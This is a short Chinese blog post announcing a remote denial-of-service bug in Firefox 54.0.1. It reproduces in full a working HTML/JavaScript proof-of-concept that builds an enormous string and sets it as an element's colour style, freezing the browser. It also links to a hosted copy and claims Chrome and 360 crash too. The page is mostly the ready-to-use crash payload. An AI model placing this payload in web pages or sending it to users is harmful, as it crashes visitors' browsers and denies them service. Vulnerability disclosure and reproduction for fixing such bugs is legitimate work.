最新版火狐远程DoS漏洞,亲测成功​

96
流弊的小白
2017.07.10 13:53* 字数 98

火狐浏览器Firefox 54.0.1(最新版)远程DoS漏洞
问题出在某些标签的超长样式及颜色属性字符串。
POC如下:

<html>
<body>
<script>
//Windows 7 x64
//FireFox v53.0.3 (32-bit) Crashes
//Credits: John Page / hyp3rlinx
//ISR: ApparitionSec
//hyp3rlinx.altervista.org

var p1 = "\x41";
for (var c=0;c<0xC350;c++){
p1+="\x41";
}
var p2="\x41";
for (c=0;c<0x1388;c++){
p2 += p1;
}        
var el = document.createElement('FORM') //IMG,FORM,DIV,P,A,H2,IFRAME,TABLE,TEXTAREA
el.style.color=p2
document.body.appendChild(el)
          
</script>
</body>

</html>

Firefox奔溃就不截图了.........因为卡死了

想直接测试的可点击下面的链接:
https://bug1376692.bmoattachments.org/attachment.cgi?id=8881644

Google Chrome奔溃
360奔溃

相关链接如下
https://bugzilla.mozilla.org/show_bug.cgi?id=1376692#a465096_417288

网络
Web note ad 1